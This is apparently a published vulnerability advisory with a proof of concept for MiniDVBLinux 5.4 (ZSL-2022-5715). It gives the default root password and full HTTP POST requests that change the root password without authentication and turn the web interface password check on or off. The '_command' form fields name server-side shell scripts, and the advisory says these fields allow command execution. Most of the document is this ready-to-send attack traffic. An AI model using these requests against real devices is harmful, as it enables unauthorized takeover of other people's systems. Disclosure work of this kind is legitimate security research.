MiniDVBLinux 5.4 Change Root Password

MiniDVBLinux 5.4 Change Root Password PoCVendor: MiniDVBLinuxProduct web page: https://www.minidvblinux.deAffected version: <=5.4Summary: MiniDVBLinux(TM) Distribution (MLD). MLD offers a simpleway to convert a standard PC into a Multi Media Centre based on theVideo Disk Recorder (VDR) by Klaus Schmidinger. Features of thisLinux based Digital Video Recorder: Watch TV, Timer controlledrecordings, Time Shift, DVD and MP3 Replay, Setup and configurationvia browser, and a lot more. MLD strives to be as small as possible,modular, simple. It supports numerous hardware platforms, like classicdesktops in 32/64bit and also various low power ARM systems.Desc: The application allows a remote attacker to change the rootpassword of the system without authentication (disabled by default)and verification of previously assigned credential. Command executionalso possible using several POST parameters.Tested on: MiniDVBLinux 5.4           BusyBox v1.25.1           Architecture: armhf, armhf-rpi2           GNU/Linux 4.19.127.203 (armv7l)           VideoDiskRecorder 2.4.6Vulnerability discovered by Gjoko 'LiquidWorm' Krstic                            @zeroscienceAdvisory ID: ZSL-2022-5715Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2022-5715.php24.09.2022--Default root password: mld500Change system password:-----------------------POST /?site=setup&section=System HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9Accept-Encoding: gzip, deflateAccept-Language: en-US,en;q=0.9,mk;q=0.8,sr;q=0.7,hr;q=0.6Cache-Control: max-age=0Connection: keep-aliveContent-Length: 778Content-Type: application/x-www-form-urlencodedCookie: fadein=true; sessid=fb9b4f16b50c4d3016ef434c760799fc; PHPSESSID=jbqjvk5omsb6pbpas78ll57qnpmvb4st7fk3r7slq80ecrdsubebn31tptjhvfbaHost: ip:8008Origin: http://ip:8008Referer: http://ip:8008/?site=setup&section=SystemUpgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/105.0.0.0 Safari/537.36sec-gpc: 1APT_UPGRADE_CHECK=1&APT_SYSTEM_ID=1&APT_PACKAGE_CLASS_command=%2Fetc%2Fsetup%2Fapt.sh+setclass&APT_PACKAGE_CLASS=stable&SYSTEM_NAME=MiniDVBLinux&SYSTEM_VERSION_command=%2Fetc%2Fsetup%2Fbase.sh+setversion&SYSTEM_VERSION=5.4&SYSTEM_PASSWORD_command=%2Fetc%2Fsetup%2Fbase.sh+setpassword&SYSTEM_PASSWORD=r00t&BUSYBOX_ACPI_command=%2Fetc%2Fsetup%2Fbusybox.sh+setAcpi&BUSYBOX_NTPD_command=%2Fetc%2Fsetup%2Fbusybox.sh+setNtpd&BUSYBOX_NTPD=1&LOG_LEVEL=1&SYSLOG_SIZE_command=%2Fetc%2Fsetup%2Finit.sh+setsyslog&SYSLOG_SIZE=&LANG_command=%2Fetc%2Fsetup%2Flocales.sh+setlang&LANG=en_GB.UTF-8&TIMEZONE_command=%2Fetc%2Fsetup%2Flocales.sh+settimezone&TIMEZONE=Europe%2FKumanovo&KEYMAP_command=%2Fetc%2Fsetup%2Flocales.sh+setkeymap&KEYMAP=de-latin1&action=save&params=&changed=SYSTEM_PASSWORD+Pretty post data:APT_UPGRADE_CHECK: 1APT_SYSTEM_ID: 1APT_PACKAGE_CLASS_command: /etc/setup/apt.sh setclassAPT_PACKAGE_CLASS: stableSYSTEM_NAME: MiniDVBLinuxSYSTEM_VERSION_command: /etc/setup/base.sh setversionSYSTEM_VERSION: 5.4SYSTEM_PASSWORD_command: /etc/setup/base.sh setpasswordSYSTEM_PASSWORD: r00tBUSYBOX_ACPI_command: /etc/setup/busybox.sh setAcpiBUSYBOX_NTPD_command: /etc/setup/busybox.sh setNtpdBUSYBOX_NTPD: 1LOG_LEVEL: 1SYSLOG_SIZE_command: /etc/setup/init.sh setsyslogSYSLOG_SIZE: LANG_command: /etc/setup/locales.sh setlangLANG: en_GB.UTF-8TIMEZONE_command: /etc/setup/locales.sh settimezoneTIMEZONE: Europe/KumanovoKEYMAP_command: /etc/setup/locales.sh setkeymapKEYMAP: de-latin1action: saveparams: changed: SYSTEM_PASSWORD Eenable webif password check:-----------------------------POST /?site=setup&section=System HTTP/1.1APT_UPGRADE_CHECK: 1APT_SYSTEM_ID: 1APT_PACKAGE_CLASS_command: /etc/setup/apt.sh setclassAPT_PACKAGE_CLASS: stableSYSTEM_NAME: MiniDVBLinuxSYSTEM_VERSION_command: /etc/setup/base.sh setversionSYSTEM_VERSION: 5.4SYSTEM_PASSWORD_command: /etc/setup/base.sh setpasswordSYSTEM_PASSWORD: BUSYBOX_ACPI_command: /etc/setup/busybox.sh setAcpiBUSYBOX_NTPD_command: /etc/setup/busybox.sh setNtpdBUSYBOX_NTPD: 1LOG_LEVEL: 1SYSLOG_SIZE_command: /etc/setup/init.sh setsyslogSYSLOG_SIZE: LANG_command: /etc/setup/locales.sh setlangLANG: en_GB.UTF-8TIMEZONE_command: /etc/setup/locales.sh settimezoneTIMEZONE: Europe/BerlinKEYMAP_command: /etc/setup/locales.sh setkeymapKEYMAP: de-latin1WEBIF_PASSWORD_CHECK: 1action: saveparams: changed: WEBIF_PASSWORD_CHECK Disable webif password check:-----------------------------POST /?site=setup&section=System HTTP/1.1APT_UPGRADE_CHECK: 1APT_SYSTEM_ID: 1APT_PACKAGE_CLASS_command: /etc/setup/apt.sh setclassAPT_PACKAGE_CLASS: stableSYSTEM_NAME: MiniDVBLinuxSYSTEM_VERSION_command: /etc/setup/base.sh setversionSYSTEM_VERSION: 5.4SYSTEM_PASSWORD_command: /etc/setup/base.sh setpasswordSYSTEM_PASSWORD: BUSYBOX_ACPI_command: /etc/setup/busybox.sh setAcpiBUSYBOX_NTPD_command: /etc/setup/busybox.sh setNtpdBUSYBOX_NTPD: 1LOG_LEVEL: 1SYSLOG_SIZE_command: /etc/setup/init.sh setsyslogSYSLOG_SIZE: LANG_command: /etc/setup/locales.sh setlangLANG: en_GB.UTF-8TIMEZONE_command: /etc/setup/locales.sh settimezoneTIMEZONE: Europe/BerlinKEYMAP_command: /etc/setup/locales.sh setkeymapKEYMAP: de-latin1action: saveparams: changed: WEBIF_PASSWORD_CHECK